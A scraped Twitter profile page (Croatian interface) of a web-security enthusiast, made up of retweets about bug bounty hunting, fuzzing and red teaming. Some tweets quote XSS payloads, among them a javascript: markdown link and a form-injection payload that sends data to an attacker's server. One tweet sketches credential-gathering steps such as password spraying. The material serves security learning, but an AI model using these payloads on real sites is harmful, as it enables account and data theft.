Pataliputra

@Pataliputra2

Web and API Security enthusiast.

Vrijeme pridruživanja: srpanj 2019.

Tweetovi

Blokirali ste korisnika/cu @Pataliputra2

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @Pataliputra2

  1. proslijedio/la je Tweet
    2. velj

    This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else.

    Poništi
  2. proslijedio/la je Tweet
    1. velj
    Poništi
  3. proslijedio/la je Tweet
    1. velj
    Poništi
  4. proslijedio/la je Tweet
    31. sij

    After showing a tool which remotely enumerates&destroys an cable if connected to a blue team controlled WiFi (for Internet upstream), made a clear point that this is not how the cable should be deployed. So I ported the tool to NMAP scanner 1/2

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet

    »_ everything is not as it seems. 🎃 «input»; p=-alert(1)}//\ * var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"}; «input»; p=\&q=-alert(1)// * var n = {a: "\", b: "-alert(1)}//"};

    Poništi
  6. proslijedio/la je Tweet
    31. sij
    Poništi
  7. proslijedio/la je Tweet
    31. sij

    If an application uses markdown, make sure to test it for xss. I used [Click here](javascript:alert(1)), to create a link via markdown and when the user clicks on Click here, the xss will get executed. Read this article.

    Poništi
  8. proslijedio/la je Tweet

    🎉 New blogpost :) Quick blogpost about how I found a OOM/DoS bug in a famous / package using coverage-guided fuzzer. ➡️ Fuzzer: Jsfuzz by ➡️ Target: wasm-parser ➡️ Bug: DoS/OOM

    Poništi
  9. proslijedio/la je Tweet
    30. sij

    I would suggest everyone to take a look at his blog post about Windows Firewall, where he covers into the details on how you can mitigate lateral movement in AD

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    30. sij
    Poništi
  11. proslijedio/la je Tweet
    30. sij

    Two new videos: Exploitation of GraphQL () and exploitation of SVG XSS ()!!

    Poništi
  12. proslijedio/la je Tweet
    30. sij
    Poništi
  13. proslijedio/la je Tweet
    30. sij
    Poništi
  14. proslijedio/la je Tweet
    30. sij
    Poništi
  15. proslijedio/la je Tweet
    29. sij

    How to Red Team #1 - A twitter red team mind map Need credentials from the outside? 1. OSINT (Find e-mail/PII) 2. Social Engineer (Trick someone into clicking an e-mail you sent them w/o a payload) 3. Target External Services (Password Spray or find a vulnerable service )

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    30. sij
    Poništi
  17. proslijedio/la je Tweet
    29. sij
    Poništi
  18. proslijedio/la je Tweet
    29. sij

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    29. sij
    Poništi
  20. proslijedio/la je Tweet
    28. sij

    of Twitter, when testing an API, what tools do you use? Curl? Burp? Fiddler? Powershell? Custom Scripts? Are there certain situations where one is more applicable than the other? Love to reads any blogs on the subject. I bet has one somewhere..

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·